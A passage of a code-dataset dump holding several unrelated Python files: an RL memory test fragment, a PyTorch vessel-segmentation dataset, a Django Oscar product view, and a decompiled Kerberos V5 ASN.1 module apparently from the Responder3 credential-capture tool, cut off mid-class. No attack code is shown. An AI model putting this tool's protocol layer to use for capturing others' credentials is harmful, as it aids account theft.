mem.append(St=np.array([i, i], dtype=float),\n At=i, Rt_1=-i, St_1=np.array([i+1,i+1], dtype=float), done=True)\n res = mem.get_batch(3)\n print(res)\n","sub_path":"marcin/rl_agent/rl_agent/agents/memory.py","file_name":"memory.py","file_ext":"py","file_size_in_byte":9317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"155420265","text":"import os\nimport pickle\nimport torch\nfrom torch.utils.data import Dataset\nfrom torchvision.transforms import Compose, RandomHorizontalFlip, RandomVerticalFlip\nfrom utils.helpers import Fix_RandomRotation\n\n\nclass vessel_dataset(Dataset):\n def __init__(self, path, mode, is_val=False, split=None):\n\n self.mode = mode\n self.is_val = is_val\n self.data_path = os.path.join(path, f\"{mode}_pro\")\n self.data_file = os.listdir(self.data_path)\n self.img_file = self._select_img(self.data_file)\n if split is not None and mode == \"training\":\n assert split > 0 and split < 1\n if not is_val:\n self.img_file = self.img_file[:int(split*len(self.img_file))]\n else:\n self.img_file = self.img_file[int(split*len(self.img_file)):]\n self.transforms = Compose([\n RandomHorizontalFlip(p=0.5),\n RandomVerticalFlip(p=0.5),\n Fix_RandomRotation(),\n ])\n\n def __getitem__(self, idx):\n img_file = self.img_file[idx]\n with open(file=os.path.join(self.data_path, img_file), mode='rb') as file:\n img = torch.from_numpy(pickle.load(file)).float()\n gt_file = \"gt\" + img_file[3:]\n with open(file=os.path.join(self.data_path, gt_file), mode='rb') as file:\n gt = torch.from_numpy(pickle.load(file)).float()\n\n if self.mode == \"training\" and not self.is_val:\n seed = torch.seed()\n torch.manual_seed(seed)\n img = self.transforms(img)\n torch.manual_seed(seed)\n gt = self.transforms(gt)\n\n return img, gt\n\n def _select_img(self, file_list):\n img_list = []\n for file in file_list:\n if file[:3] == \"img\":\n img_list.append(file)\n\n return img_list\n\n def __len__(self):\n return len(self.img_file)\n","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"408507511","text":"from django.contrib import messages\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.http import HttpResponseRedirect\n\nfrom oscar.apps.dashboard.catalogue.views \\\n import ProductCreateUpdateView as CoreProductCreateUpdateView\n\nfrom forms import ProductForm, ProductFragmentFormSet\n\nclass ProductCreateUpdateView(CoreProductCreateUpdateView):\n form_class = ProductForm\n fragment_formset = ProductFragmentFormSet\n\n def get_context_data(self, **kwargs):\n ctx = super(ProductCreateUpdateView, self).get_context_data(**kwargs)\n if 'fragment_formset' not in ctx:\n ctx['fragment_formset'] \\\n = self.fragment_formset(instance=self.object)\n return ctx\n\n\n\n def process_all_forms(self, form):\n \"\"\"\n Short-circuits the regular logic to have one place to have our\n logic to check all forms\n \"\"\"\n # Need to create the product here because the inline forms need it\n # can't use commit=False because ProductForm does not support it\n if self.creating and form.is_valid():\n self.object = form.save()\n\n stockrecord_formset = self.stockrecord_formset(\n self.product_class, self.request.user,\n self.request.POST, instance=self.object)\n category_formset = self.category_formset(\n self.request.POST, instance=self.object)\n fragment_formset = self.fragment_formset(\n self.request.POST, self.request.FILES, instance=self.object)\n image_formset = self.image_formset(\n self.request.POST, self.request.FILES, instance=self.object)\n recommended_formset = self.recommendations_formset(\n self.request.POST, self.request.FILES, instance=self.object)\n\n is_valid = all([\n form.is_valid(),\n category_formset.is_valid(),\n fragment_formset.is_valid(),\n image_formset.is_valid(),\n recommended_formset.is_valid(),\n stockrecord_formset.is_valid(),\n ])\n\n if is_valid:\n return self.forms_valid(\n form, stockrecord_formset, category_formset,\n fragment_formset, image_formset, recommended_formset)\n else:\n # delete the temporary product again\n if self.creating and form.is_valid():\n self.object.delete()\n self.object = None\n # We currently don't hold on to images if the other formsets didn't\n # validate. But as the browser won't re-POST any images, we can do\n # no better than re-bind the image formset, which means the user\n # will have to re-select the images (see #1126)\n image_formset = self.image_formset(instance=self.object)\n\n return self.forms_invalid(\n form, stockrecord_formset, category_formset,\n fragment_formset, image_formset, recommended_formset)\n\n def forms_valid(self, form, stockrecord_formset, category_formset,\n fragment_formset, image_formset, recommended_formset):\n \"\"\"\n Save all changes and display a success url.\n \"\"\"\n if not self.creating:\n # a just created product was already saved in process_all_forms()\n self.object = form.save()\n\n # Save formsets\n category_formset.save()\n fragment_formset.save()\n image_formset.save()\n recommended_formset.save()\n stockrecord_formset.save()\n\n return HttpResponseRedirect(self.get_success_url())\n\n def forms_invalid(self, form, stockrecord_formset, category_formset,\n fragment_formset, image_formset, recommended_formset):\n messages.error(self.request,\n _(\"Your submitted data was not valid - please \"\n \"correct the below errors\"))\n ctx = self.get_context_data(form=form,\n stockrecord_formset=stockrecord_formset,\n category_formset=category_formset,\n fragment_formset=fragment_formset,\n image_formset=image_formset,\n recommended_formset=recommended_formset)\n return self.render_to_response(ctx)\n","sub_path":"practica/apps/dashboard/catalogue/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"293983683","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: C:\\Users\\victim\\Desktop\\Responder3\\responder3\\protocols\\KerberosV5.py\n# Compiled at: 2019-04-29 07:33:30\n# Size of source mod 2**32: 29407 bytes\nfrom asn1crypto import core\nimport enum, os\nfrom responder3.core.commons import *\nfrom responder3.core.logging.log_objects import Credential\nfrom responder3.core.asyncio_helpers import *\nTAG = 'explicit'\nUNIVERSAL = 0\nAPPLICATION = 1\nCONTEXT = 2\nkrb5_pvno = 5\n\nclass NAME_TYPE(enum.Enum):\n UNKNOWN = 0\n PRINCIPAL = 1\n SRV_INST = 2\n SRV_HST = 3\n SRV_XHST = 4\n UID = 5\n X500_PRINCIPAL = 6\n SMTP_NAME = 7\n ENTERPRISE_PRINCIPAL = 10\n WELLKNOWN = 11\n ENT_PRINCIPAL_AND_ID = -130\n MS_PRINCIPAL = -128\n MS_PRINCIPAL_AND_ID = -129\n NTLM = -1200\n\n\nclass MESSAGE_TYPE(enum.Enum):\n KRB_AS_REQ = 10\n KRB_AS_REP = 11\n KRB_TGS_REQ = 12\n KRB_TGS_REP = 13\n KRB_AP_REQ = 14\n KRB_AP_REP = 15\n KRB_SAFE = 20\n KRB_PRIV = 21\n KRB_CRED = 22\n KRB_ERROR = 30\n\n\nclass EncryptionType(enum.Enum):\n NULL = 0\n DES_CBC_CRC = 1\n DES_CBC_MD4 = 2\n DES_CBC_MD5 = 3\n DES3_CBC_MD5 = 5\n OLD_DES3_CBC_SHA1 = 7\n SIGN_DSA_GENERATE = 8\n ENCRYPT_RSA_PRIV = 9\n ENCRYPT_RSA_PUB = 10\n DES3_CBC_SHA1 = 16\n AES128_CTS_HMAC_SHA1_96 = 17\n AES256_CTS_HMAC_SHA1_96 = 18\n ARCFOUR_HMAC_MD5 = 23\n ARCFOUR_HMAC_MD5_56 = 24\n ENCTYPE_PK_CROSS = 48\n ARCFOUR_MD4 = -128\n ARCFOUR_HMAC_OLD = -133\n ARCFOUR_HMAC_OLD_EXP = -135\n DES_CBC_NONE = -4096\n DES3_CBC_NONE = -4097\n DES_CFB64_NONE = -4098\n DES_PCBC_NONE = -4099\n DIGEST_MD5_NONE = -4100\n CRAM_MD5_NONE = -4101\n\n\nclass PaDataType(enum.Enum):\n NONE = 0\n TGS_REQ = 1\n AP_REQ = 1\n ENC_TIMESTAMP = 2\n PW_SALT = 3\n ENC_UNIX_TIME = 5\n SANDIA_SECUREID = 6\n SESAME = 7\n OSF_DCE = 8\n CYBERSAFE_SECUREID = 9\n AFS3_SALT = 10\n ETYPE_INFO = 11\n SAM_CHALLENGE = 12\n SAM_RESPONSE = 13\n PK_AS_REQ_19 = 14\n PK_AS_REP_19 = 15\n PK_AS_REQ_WIN = 15\n PK_AS_REQ = 16\n PK_AS_REP = 17\n PA_PK_OCSP_RESPONSE = 18\n ETYPE_INFO2 = 19\n USE_SPECIFIED_KVNO = 20\n SVR_REFERRAL_INFO = 20\n SAM_REDIRECT = 21\n GET_FROM_TYPED_DATA = 22\n SAM_ETYPE_INFO = 23\n SERVER_REFERRAL = 25\n ALT_PRINC = 24\n SAM_CHALLENGE2 = 30\n SAM_RESPONSE2 = 31\n PA_EXTRA_TGT = 41\n TD_KRB_PRINCIPAL = 102\n PK_TD_TRUSTED_CERTIFIERS = 104\n PK_TD_CERTIFICATE_INDEX = 105\n TD_APP_DEFINED_ERROR = 106\n TD_REQ_NONCE = 107\n TD_REQ_SEQ = 108\n PA_PAC_REQUEST = 128\n FOR_USER = 129\n FOR_X509_USER = 130\n FOR_CHECK_DUPS = 131\n AS_CHECKSUM = 132\n PK_AS_09_BINDING = 132\n CLIENT_CANONICALIZED = 133\n FX_COOKIE = 133\n AUTHENTICATION_SET = 134\n AUTH_SET_SELECTED = 135\n FX_FAST = 136\n FX_ERROR = 137\n ENCRYPTED_CHALLENGE = 138\n OTP_CHALLENGE = 141\n OTP_REQUEST = 142\n OTP_CONFIRM = 143\n OTP_PIN_CHANGE = 144\n EPAK_AS_REQ = 145\n EPAK_AS_REP = 146\n PKINIT_KX = 147\n PKU2U_NAME = 148\n REQ_ENC_PA_REP = 149\n SUPPORTED_ETYPES = 165\n\n\nclass PADATA_TYPE(core.Enumerated):\n _map = {0:'NONE', \n 1:'TGS-REQ', \n 1:'AP-REQ', \n 2:'ENC-TIMESTAMP', \n 3:'PW-SALT', \n 5:'ENC-UNIX-TIME', \n 6:'SANDIA-SECUREID', \n 7:'SESAME', \n 8:'OSF-DCE', \n 9:'CYBERSAFE-SECUREID', \n 10:'AFS3-SALT', \n 11:'ETYPE-INFO', \n 12:'SAM-CHALLENGE', \n 13:'SAM-RESPONSE', \n 14:'PK-AS-REQ-19', \n 15:'PK-AS-REP-19', \n 15:'PK-AS-REQ-WIN', \n 16:'PK-AS-REQ', \n 17:'PK-AS-REP', \n 18:'PA-PK-OCSP-RESPONSE', \n 19:'ETYPE-INFO2', \n 20:'USE-SPECIFIED-KVNO', \n 20:'SVR-REFERRAL-INFO', \n 21:'SAM-REDIRECT', \n 22:'GET-FROM-TYPED-DATA', \n 23:'SAM-ETYPE-INFO', \n 25:'SERVER-REFERRAL', \n 24:'ALT-PRINC', \n 30:'SAM-CHALLENGE2', \n 31:'SAM-RESPONSE2', \n 41:'PA-EXTRA-TGT', \n 102:'TD-KRB-PRINCIPAL', \n 104:'PK-TD-TRUSTED-CERTIFIERS', \n 105:'PK-TD-CERTIFICATE-INDEX', \n 106:'TD-APP-DEFINED-ERROR', \n 107:'TD-REQ-NONCE', \n 108:'TD-REQ-SEQ', \n 128:'PA-PAC-REQUEST', \n 129:'FOR-USER', \n 130:'FOR-X509-USER', \n 131:'FOR-CHECK-DUPS', \n 132:'AS-CHECKSUM', \n 132:'PK-AS-09-BINDING', \n 133:'CLIENT-CANONICALIZED', \n 133:'FX-COOKIE', \n 134:'AUTHENTICATION-SET', \n 135:'AUTH-SET-SELECTED', \n 136:'FX-FAST', \n 137:'FX-ERROR', \n 138:'ENCRYPTED-CHALLENGE', \n 141:'OTP-CHALLENGE', \n 142:'OTP-REQUEST', \n 143:'OTP-CONFIRM', \n 144:'OTP-PIN-CHANGE', \n 145:'EPAK-AS-REQ', \n 146:'EPAK-AS-REP', \n 147:'PKINIT-KX', \n 148:'PKU2U-NAME', \n 149:'REQ-ENC-PA-REP', \n 165:'SUPPORTED-ETYPES'}\n\n\nclass AUTHDATA_TYPE(core.Enumerated):\n _map = {1:'IF-RELEVANT', \n 2:'INTENDED-FOR_SERVER', \n 3:'INTENDED-FOR-APPLICATION-CLASS', \n 4:'KDC-ISSUED', \n 5:'AND-OR', \n 6:'MANDATORY-TICKET-EXTENSIONS', \n 7:'IN-TICKET-EXTENSIONS', \n 8:'MANDATORY-FOR-KDC', \n 9:'INITIAL-VERIFIED-CAS', \n 64:'OSF-DCE', \n 65:'SESAME', \n 66:'OSF-DCE-PKI-CERTID', \n 128:'WIN2K-PAC', \n 129:'GSS-API-ETYPE-NEGOTIATION', \n -17:'SIGNTICKET-OLDER', \n 142:'SIGNTICKET-OLD', \n 512:'SIGNTICKET'}\n\n\nclass CKSUMTYPE(core.Enumerated):\n _map = {0:'NONE', \n 1:'CRC32', \n 2:'RSA_MD4', \n 3:'RSA_MD4_DES', \n 4:'DES_MAC', \n 5:'DES_MAC_K', \n 6:'RSA_MD4_DES_K', \n 7:'RSA_MD5', \n 8:'RSA_MD5_DES', \n 9:'RSA_MD5_DES3', \n 10:'SHA1_OTHER', \n 12:'HMAC_SHA1_DES3', \n 14:'SHA1', \n 15:'HMAC_SHA1_96_AES_128', \n 16:'HMAC_SHA1_96_AES_256', \n 32771:'GSSAPI', \n -138:'HMAC_MD5', \n -1138:'HMAC_MD5_ENC'}\n\n\nclass ENCTYPE(core.Enumerated):\n _map = {0:'NULL', \n 1:'DES_CBC_CRC', \n 2:'DES_CBC_MD4', \n 3:'DES_CBC_MD5', \n 5:'DES3_CBC_MD5', \n 7:'OLD_DES3_CBC_SHA1', \n 8:'SIGN_DSA_GENERATE', \n 9:'ENCRYPT_RSA_PRIV', \n 10:'ENCRYPT_RSA_PUB', \n 16:'DES3_CBC_SHA1', \n 17:'AES128_CTS_HMAC_SHA1_96', \n 18:'AES256_CTS_HMAC_SHA1_96', \n 23:'ARCFOUR_HMAC_MD5', \n 24:'ARCFOUR_HMAC_MD5_56', \n 48:'ENCTYPE_PK_CROSS', \n -128:'ARCFOUR_MD4', \n -133:'ARCFOUR_HMAC_OLD', \n -135:'ARCFOUR_HMAC_OLD_EXP', \n -4096:'DES_CBC_NONE', \n -4097:'DES3_CBC_NONE', \n -4098:'DES_CFB64_NONE', \n -4099:'DES_PCBC_NONE', \n -4100:'DIGEST_MD5_NONE', \n -4101:'CRAM_MD5_NONE'}\n\n\nclass SequenceOfEnctype(core.SequenceOf):\n _child_spec = core.Integer\n\n\nclass Microseconds(core.Integer):\n __doc__ = ' ::= INTEGER (0..999999)\\n\\t-- microseconds\\n '\n\n\nclass krb5int32(core.Integer):\n __doc__ = 'krb5int32 ::= INTEGER (-2147483648..2147483647)\\n '\n\n\nclass krb5uint32(core.Integer):\n __doc__ = 'krb5uint32 ::= INTEGER (0..4294967295)\\n '\n\n\nclass KerberosString(core.GeneralString):\n __doc__ = 'KerberosString ::= GeneralString (IA5String)\\n\\tFor compatibility, implementations MAY choose to accept GeneralString\\n\\tvalues that contain characters other than those permitted by\\n\\tIA5String...\\n\\t'\n\n\nclass SequenceOfKerberosString(core.SequenceOf):\n _child_spec = KerberosString\n\n\nclass Realm(KerberosString):\n __doc__ = 'Realm ::= KerberosString\\n\\t'\n\n\nclass PrincipalName(core.Sequence):\n __doc__ = 'PrincipalName for KDC-REQ-BODY and Ticket\\n\\tPrincipalName ::= SEQUENCE {\\n\\t\\tname-type\\t[0] Int32,\\n\\t\\tname-string [1] SEQUENCE OF KerberosString\\n\\t}\\n\\t'\n _fields = [\n (\n 'name-type', krb5int32, {'tag_type':TAG, 'tag':0}),\n (\n 'name-string', SequenceOfKerberosString, {'tag_type':TAG, 'tag':1})]\n\n\nclass Principal(core.Sequence):\n _fields = [\n (\n 'name', PrincipalName, {'tag_type':TAG, 'tag':0}),\n (\n 'realm', Realm, {'tag_type':TAG, 'tag':1})]\n\n\nclass Principals(core.SequenceOf):\n _child_spec = Principal\n\n\nclass HostAddress(core.Sequence):\n __doc__ = 'HostAddress for HostAddresses\\n HostAddress ::= SEQUENCE {\\n addr-type [0] Int32,\\n address [1] OCTET STRING\\n }\\n '\n _fields = [\n (\n 'addr-type', krb5int32, {'tag_type':TAG, 'tag':0}),\n (\n 'address', core.OctetString, {'tag_type':TAG, 'tag':1})]\n\n\nclass HostAddresses(core.SequenceOf):\n __doc__ = 'SEQUENCE OF HostAddress\\n\\t'\n _child_spec = HostAddress\n\n\nclass KerberosTime(core.GeneralizedTime):\n __doc__ = 'KerberosTime ::= GeneralizedTime\\n '\n\n\nclass AuthorizationDataElement(core.SequenceOf):\n _fields = [\n (\n 'ad-type', krb5int32, {'tag_type':TAG, 'tag':0}),\n (\n 'ad-data', core.OctetString, {'tag_type':TAG, 'tag':1})]\n\n\nclass AuthorizationData(core.SequenceOf):\n __doc__ = 'SEQUENCE OF HostAddress\\n\\t'\n _child_spec = AuthorizationDataElement\n\n\nclass APOptions(core.BitString):\n _map = {0:'reserved', \n 1:'use-session-key', \n 2:'mutual-required'}\n\n\nclass TicketFlags(core.BitString):\n _map = {0:'reserved', \n 1:'forwardable', \n 2:'forwarded', \n 3:'proxiable', \n 4:'proxy', \n 5:'may-postdate', \n 6:'postdated', \n 7:'invalid', \n 8:'renewable', \n 9:'initial', \n 10:'pre-authent', \n 11:'hw-authent', \n 12:'transited-policy-checked', \n 13:'ok-as-delegate', \n 14:'anonymous', \n 15:'enc-pa-rep'}\n\n\nclass KDCOptions(core.BitString):\n _map = {0:'reserved', \n 1:'forwardable', \n 2:'forwarded', \n 3:'proxiable', \n 4:'proxy', \n 5:'allow-postdate', \n 6:'postdated', \n 7:'unused7', \n 8:'renewable', \n 9:'unused9', \n 10:'unused10', \n 11:'opt-hardware-auth', \n 12:'unused12', \n 13:'unused13', \n 14:'constrained-delegation', \n 15:'canonicalize', \n 16:'request-anonymous', \n 17:'unused17', \n 18:'unused18', \n 19:'unused19', \n 20:'unused20', \n 21:'unused21', \n 22:'unused22', \n 23:'unused23', \n 24:'unused24', \n 25:'unused25', \n 26:'disable-transited-check', \n 27:'renewable-ok', \n 28:'enc-tkt-in-skey', \n 30:'renew', \n 31:'validate'}\n\n\nclass LR_TYPE(core.Enumerated):\n _map = {0:'NONE', \n 1:'INITIAL_TGT', \n 2:'INITIAL', \n 3:'ISSUE_USE_TGT', \n 4:'RENEWAL', \n 5:'REQUEST', \n 6:'PW_EXPTIME', \n 7:'ACCT_EXPTIME'}\n\n\nclass LastReqInner(core.Sequence):\n _fields = [\n (\n 'lr-type', krb5int32, {'tag_type':TAG, 'tag':0}),\n (\n 'lr-value', KerberosTime, {'tag_type':TAG, 'tag':1})]\n\n\nclass LastReq(core.SequenceOf):\n _child_spec = LastReqInner\n\n\nclass EncryptedData(core.Sequence):\n _fields = [\n (\n 'etype', krb5int32, {'tag_type':TAG, 'tag':0}),\n (\n 'kvno', krb5uint32, {'tag_type':TAG, 'tag':1, 'optional':True}),\n (\n 'cipher', core.OctetString, {'tag_type':TAG, 'tag':2})]\n\n\nclass EncryptionKey(core.Sequence):\n _fields = [\n (\n 'keytype', krb5uint32, {'tag_type':TAG, 'tag':0}),\n (\n 'keyvalue', core.OctetString, {'tag_type':TAG, 'tag':1})]\n\n\nclass TransitedEncoding(core.Sequence):\n _fields = [\n (\n 'tr-type', krb5uint32, {'tag_type':TAG, 'tag':0}),\n (\n 'contents', core.OctetString, {'tag_type':TAG, 'tag':1})]\n\n\nclass Ticket(core.Sequence):\n explicit = (\n APPLICATION, 1)\n _fields = [\n (\n 'tkt-vno', krb5int32, {'tag_type':TAG, 'tag':0}),\n (\n 'realm', Realm, {'tag_type':TAG, 'tag':1}),\n (\n 'sname', PrincipalName, {'tag_type':TAG, 'tag':2}),\n (\n 'enc-part', EncryptedData, {'tag_type':TAG, 'tag':3})]\n\n\nclass SequenceOfTicket(core.SequenceOf):\n __doc__ = 'SEQUENCE OF Ticket for KDC-REQ-BODY\\n\\t'\n _child_spec = Ticket\n\n\nclass EncTicketPart(core.Sequence):\n explicit = (\n APPLICATION, 3)\n _fields = [\n (\n 'flags', TicketFlags, {'tag_type':TAG, 'tag':0}),\n (\n 'key', EncryptionKey, {'tag_type':TAG, 'tag':1}),\n (\n 'crealm', Realm, {'tag_type':TAG, 'tag':2}),\n (\n 'cname', PrincipalName, {'tag_type':TAG, 'tag':3}),\n (\n 'transited', TransitedEncoding, {'tag_type':TAG, 'tag':4}),\n (\n 'authtime', KerberosTime, {'tag_type':TAG, 'tag':5}),\n (\n 'starttime', KerberosTime, {'tag_type':TAG, 'tag':6, 'optional':True}),\n (\n 'endtime', KerberosTime, {'tag_type':TAG, 'tag':7}),\n (\n 'renew-till', KerberosTime, {'tag_type':TAG, 'tag':8, 'optional':True}),\n (\n 'caddr', HostAddresses, {'tag_type':TAG, 'tag':9, 'optional':True}),\n (\n 'authorization-data', AuthorizationData, {'tag_type':TAG, 'tag':10, 'optional':True})]\n\n\nclass Checksum(core.Sequence):\n _fields = [\n (\n 'cksumtype', CKSUMTYPE, {'tag_type':TAG, 'tag':0}),\n (\n 'checksum', core.OctetString, {'tag_type':TAG, 'tag':1})]\n\n\nclass Authenticator(core.Sequence):\n explicit = (\n APPLICATION, 2)\n _fields = [\n (\n 'authenticator-vno', krb5int32, {'tag_type':TAG, 'tag':0}),\n (\n 'crealm', Realm, {'tag_type':TAG, 'tag':1}),\n (\n 'cname', PrincipalName, {'tag_type':TAG, 'tag':2}),\n (\n 'cksum', Checksum, {'tag_type':TAG, 'tag':3, 'optional':True}),\n (\n 'cusec', krb5int32, {'tag_type':TAG, 'tag':4}),\n (\n 'ctime', KerberosTime, {'tag_type':TAG, 'tag':5}),\n (\n 'subkey', EncryptionKey, {'tag_type':TAG, 'tag':6, 'optional':True}),\n (\n 'seq-number', krb5uint32, {'tag_type':TAG, 'tag':7, 'optional':True}),\n (\n 'authorization-data', AuthorizationData, {'tag_type':TAG, 'tag':8, 'optional':True})]\n\n\nclass PA_DATA(core.Sequence):\n _fields = [\n (\n 'padata-type', core.Integer, {'tag_type':TAG, 'tag':1}),\n (\n 'padata-value', core.OctetString, {'tag_type':TAG, 'tag':2})]\n\n\nclass ETYPE_INFO_ENTRY(core.Sequence):\n _fields = [\n (\n 'etype', krb5int32, {'tag_type':TAG, 'tag':0}),\n (\n 'salt', core.OctetString, {'tag_type':TAG, 'tag':1, 'optional':True}),\n (\n 'salttype', krb5int32, {'tag_type':TAG, 'tag':2, 'optional':True})]\n\n\nclass ETYPE_INFO(core.SequenceOf):\n _child_spec = ETYPE_INFO_ENTRY\n\n\nclass ETYPE_INFO2_ENTRY(core.Sequence):\n _fields = [\n (\n 'etype', krb5int32, {'tag_type':TAG, 'tag':0}),\n (\n 'salt', KerberosString, {'tag_type':TAG, 'tag':1, 'optional':True}),\n (\n 's2kparams', core.OctetString, {'tag_type':TAG, 'tag':2, 'optional':True})]\n\n\nclass ETYPE_INFO2(core.SequenceOf):\n _child_spec = ETYPE_INFO2_ENTRY\n\n\nclass METHOD_DATA(core.SequenceOf):\n _child_spec = PA_DATA\n\n\nclass TypedData(core.Sequence):\n _fields = [\n (\n 'data-type', krb5int32, {'tag_type':TAG, 'tag':0}),\n (\n 'data-value', core.OctetString, {'tag_type':TAG, 'tag':1, 'optional':True})]\n\n\nclass KDC_REQ_BODY(core.Sequence):\n _fields = [\n (\n 'kdc-options', KDCOptions, {'tag_type':TAG, 'tag':0}),\n (\n 'cname', PrincipalName, {'tag_type':TAG, 'tag':1, 'optional':True}),\n (\n 'realm', Realm, {'tag_type':TAG, 'tag':2}),\n (\n 'sname', PrincipalName, {'tag_type':TAG, 'tag':3, 'optional':True}),\n (\n 'from', KerberosTime, {'tag_type':TAG, 'tag':4, 'optional':True}),\n (\n 'till', KerberosTime, {'tag_type':TAG, 'tag':5, 'optional':True}),\n (\n 'rtime', KerberosTime, {'tag_type':TAG, 'tag':6, 'optional':True}),\n (\n 'nonce', krb5int32, {'tag_type':TAG, 'tag':7}),\n (\n 'etype', SequenceOfEnctype, {'tag_type':TAG, 'tag':8}),\n (\n 'addresses', HostAddresses, {'tag_type':TAG, 'tag':9, 'optional':True}),\n (\n 'enc-authorization-data', EncryptedData, {'tag_type':TAG, 'tag':10, 'optional':True}),\n (\n 'additional-tickets', SequenceOfTicket, {'tag_type':TAG, 'tag':11, 'optional':True})]\n\n\nclass KDC_REQ(core.Sequence):\n _fields = [\n (\n 'pvno', krb5int32, {'tag_type':TAG, 'tag':1}),\n (\n 'msg-type', krb5int32, {'tag_type':TAG, 'tag':2}),\n (\n 'padata', METHOD_DATA, {'tag_type':TAG, 'tag':3, 'optional':True}),\n (\n 'req-body', KDC_REQ_BODY, {'tag_type':TAG, 'tag':4})]\n\n\nclass AS_REQ(KDC_REQ):\n explicit = (\n APPLICATION, 10)\n\n\nclass TGS_REQ(KDC_REQ):\n explicit = (\n APPLICATION, 12)\n\n\nclass PA_ENC_TS_ENC(core.Sequence):\n _fields = [\n (\n 'patimestamp', KerberosTime, {'tag_type':TAG, 'tag':0}),\n (\n 'pausec', krb5int32, {'tag_type':TAG, 'tag':1, 'optional':True})]\n\n\nclass PA_PAC_REQUEST(core.Sequence):\n _fields = [\n (\n 'include-pac', core.Boolean, {'tag_type':TAG, 'tag':0})]\n\n\nclass PROV_SRV_LOCATION(core.GeneralString):\n pass\n\n\nclass KDC_REP(core.Sequence):\n _fields = [\n (\n 'pvno', core.Integer, {'tag_type':TAG, 'tag':0}),\n (\n 'msg-type', krb5int32, {'tag_type':TAG, 'tag':1}),\n (\n 'padata', METHOD_DATA, {'tag_type':TAG, 'tag':2, 'optional':True}),\n (\n 'crealm', Realm, {'tag_type':TAG, 'tag':3}),\n (\n 'cname', PrincipalName, {'tag_type':TAG, 'tag':4}),\n (\n 'ticket', Ticket, {'tag_type':TAG, 'tag':5}),\n (\n 'enc-part', EncryptedData, {'tag_type':TAG, 'tag':6})]\n\n\nclass AS_REP(KDC_REP):\n explicit = (\n APPLICATION, 11)\n\n\nclass TGS_REP(KDC_REP):\n explicit = (\n APPLICATION, 13)\n\n\nclass EncKDCRepPart(core.Sequence):\n _fields = [\n (\n 'key', EncryptionKey, {'tag_type':TAG, 'tag':0}),\n (\n 'last-req', LastReq, {'tag_type':TAG, 'tag':1}),\n (\n 'nonce', krb5int32, {'tag_type':TAG, 'tag':2}),\n (\n 'key-expiration', KerberosTime, {'tag_type':TAG, 'tag':3, 'optional':True}),\n (\n 'flags', TicketFlags, {'tag_type':TAG, 'tag':4}),\n (\n 'authtime', KerberosTime, {'tag_type':TAG, 'tag':5}),\n (\n 'starttime', KerberosTime, {'tag_type':TAG, 'tag':6, 'optional':True}),\n (\n 'endtime', KerberosTime, {'tag_type':TAG, 'tag':7}),\n (\n 'renew-till', KerberosTime, {'tag_type':TAG, 'tag':8, 'optional':True}),\n (\n 'srealm', Realm, {'tag_type':TAG, 'tag':9}),\n (\n 'sname', PrincipalName, {'tag_type':TAG, 'tag':10}),\n (\n 'caddr', HostAddresses, {'tag_type':TAG, 'tag':11, 'optional':True}),\n (\n 'encrypted-pa-data', METHOD_DATA, {'tag_type':TAG, 'tag':12, 'optional':True})]\n\n\nclass EncASRepPart(EncKDCRepPart):\n explicit = (\n APPLICATION, 25)\n\n\nclass EncTGSRepPart(EncKDCRepPart):\n explicit = (\n APPLICATION, 26)\n\n\nclass AP_REQ(core.Sequence):\n explicit = (\n APPLICATION, 14)\n _fields = [\n (\n 'pvno', krb5int32, {'tag_type':TAG, 'tag':0}),\n (\n 'msg-type', krb5int32, {'tag_type':TAG, 'tag':1}),\n (\n 'ap-options', APOptions, {'tag_type':TAG, 'tag':2}),\n (\n 'ticket', Ticket, {'tag_type':TAG, 'tag':3}),\n (\n 'authenticator', EncryptedData, {'tag_type':TAG, 'tag':4})]\n\n\nclass AP_REP(core.Sequence):\n explicit = (\n APPLICATION, 15)\n _fields = [\n (\n 'pvno', krb5int32, {'tag_type':TAG, 'tag':0}),\n (\n 'msg-type', krb5int32, {'tag_type':TAG, 'tag':1}),\n (\n 'enc-part', EncryptedData, {'tag_type':TAG, 'tag':2})]\n\n\nclass EncAPRepPart(core.Sequence):\n explicit = (\n APPLICATION, 27)\n _fields = [\n (\n 'ctime', KerberosTime, {'tag_type':TAG, 'tag':0}),\n (\n 'cusec', krb5int32, {'tag_type':TAG, 'tag':1}),\n (\n 'subkey', EncryptionKey, {'tag_type':TAG, 'tag':2}),\n (\n 'seq-number', krb5uint32, {'tag_type':TAG, 'tag':3, 'optional':True})]\n\n\nclass KRB_SAFE_BODY(core.Sequence):\n _fields = [\n (\n 'user-data', core.OctetString, {'tag_type':TAG, 'tag':0}),\n (\n 'timestamp', KerberosTime, {'tag_type':TAG, 'tag':1, 'optional':True}),\n (\n 'usec', krb5int32, {'tag_type':TAG, 'tag':2, 'optional':True}),\n (\n 'seq-number', krb5uint32, {'tag_type':TAG, 'tag':3, 'optional':True}),\n (\n 's-address', HostAddress, {'tag_type':TAG, 'tag':4, 'optional':True}),\n (\n 'r-address', HostAddress, {'tag_type':TAG, 'tag':5, 'optional':True})]\n\n\nclass KRB_SAFE(core.Sequence):\n explicit = (\n APPLICATION, 20)\n _fields = [\n (\n 'pvno', krb5int32, {'tag_type':TAG, 'tag':0}),\n (\n 'msg-type', krb5int32, {'tag_type':TAG, 'tag':1}),\n (\n 'safe-body', KRB_SAFE_BODY, {'tag_type':TAG, 'tag':2}),\n (\n 'cksum', Checksum, {'tag_type':TAG, 'tag':3})]\n\n\nclass KRB_PRIV(core.Sequence):\n explicit = (\n APPLICATION, 21)\n _fields = [\n (\n 'pvno', krb5int32, {'tag_type':TAG, 'tag':0}),\n (\n 'msg-type', krb5int32, {'tag_type':TAG, 'tag':1}),\n (\n 'enc-part', EncryptedData, {'tag_type':TAG, 'tag':2})]\n\n\nclass EncKrbPrivPart(core.Sequence):\n explicit = (\n APPLICATION, 28)\n _fields = [\n (\n 'user-data', core.OctetString, {'tag_type':TAG, 'tag':0}),\n (\n 'timestamp', KerberosTime, {'tag_type':TAG, 'tag':1, 'optional':True}),\n (\n 'usec', 